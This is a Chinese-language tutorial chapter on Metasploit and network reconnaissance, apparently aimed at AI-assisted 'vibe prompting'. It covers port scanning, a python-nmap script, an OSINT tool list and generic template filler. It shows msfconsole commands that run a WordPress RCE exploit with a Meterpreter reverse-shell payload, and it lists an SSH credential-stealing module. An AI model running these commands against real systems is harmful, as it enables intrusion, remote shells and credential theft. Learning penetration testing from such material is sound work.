Metasploit 框架
Vibe Prompt
「幫我用 Metasploit 掃描目標主機的開放埠與服務版本。」
基本指令
# 啟動 msfconsole
msfconsole
# 掃描埠
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.0.0.1
msf6 > set PORTS 1-1000
msf6 > run
# 使用漏洞模組
msf6 > use exploit/unix/webapp/wordpress_rce
msf6 > set RHOSTS target.com
msf6 > set PAYLOAD php/meterpreter/reverse_tcp
msf6 > set LHOST your-ip
msf6 > exploit
常用模組
| 模組 | 用途 | |------|------| | scanner/portscan/tcp | TCP 埠掃描 | | scanner/http/wordpress_scanner | WordPress 掃描 | | scanner/ssl/openssl_heartbleed | Heartbleed 檢測 | | exploit/multi/handler | 監聽 reverse shell | | post/multi/gather/ssh_creds | 竊取 SSH 憑證 |
Vibe Prompt
「幫我寫一個 Python 腳本,使用 nmap 掃描目標主機並輸出報告。」
import nmap
import json
nm = nmap.PortScanner()
target = "10.0.0.1"
nm.scan(target, arguments="-sV -sC -O -p 1-1000")
for host in nm.all_hosts():
print(f"\nHost: {host} ({nm[host].hostname()})")
print(f"State: {nm[host].state()}")
print(f"OS: {nm[host].get('osmatch', [{}])[0].get('name', 'Unknown')}")
for proto in nm[host].all_protocols():
ports = nm[host][proto].keys()
for port in sorted(ports):
service = nm[host][proto][port]
print(f" {port}/{proto}: {service['name']} {service['version']} ({service['state']})")
OSINT 資訊收集
| 工具 | 用途 | |------|------| | Recon-ng | Web 資訊收集框架 | | theHarvester | Email、子網域收集 | | Shodan | IoT 設備搜尋 | | Censys | 網路資產地圖 | | Whois | 域名註冊資訊 |
本章總結
- 理解核心概念與原理
- 掌握實作方法與技巧
- 熟悉常見問題與解決方案
- 能夠應用於實際專案
延伸閱讀
- 官方文件與 API 參考
- GitHub 開源專案範例
- 相關技術書籍與課程
- 社群討論與技術部落格
實作範例
基礎範例
# 本節提供一個完整的實作範例
# 讓你能夠將所學應用到實際專案中
步驟說明
- 初始化:設定開發環境與必要工具
- 資料準備:收集與整理所需資料
- 核心實作:實作主要功能與邏輯
- 測試驗證:確保功能正確運作
- 最佳化:調整效能與使用者體驗
常見錯誤
| 錯誤類型 | 可能原因 | 解決方法 | |---------|---------|---------| | 編譯錯誤 | 語法問題 | 檢查程式碼語法 | | 執行錯誤 | 環境問題 | 確認相依套件已安裝 | | 邏輯錯誤 | 演算法問題 | 逐步除錯與測試 | | 效能問題 | 效率問題 | 使用效能分析工具 |
程式碼範例
# 範例程式碼
import sys
def main():
# 主程式邏輯
print("Hello, World!")
if __name__ == "__main__":
main()
相關資源
- 官方文件
- API 參考手冊
- 開源專案範例
- 技術社群討論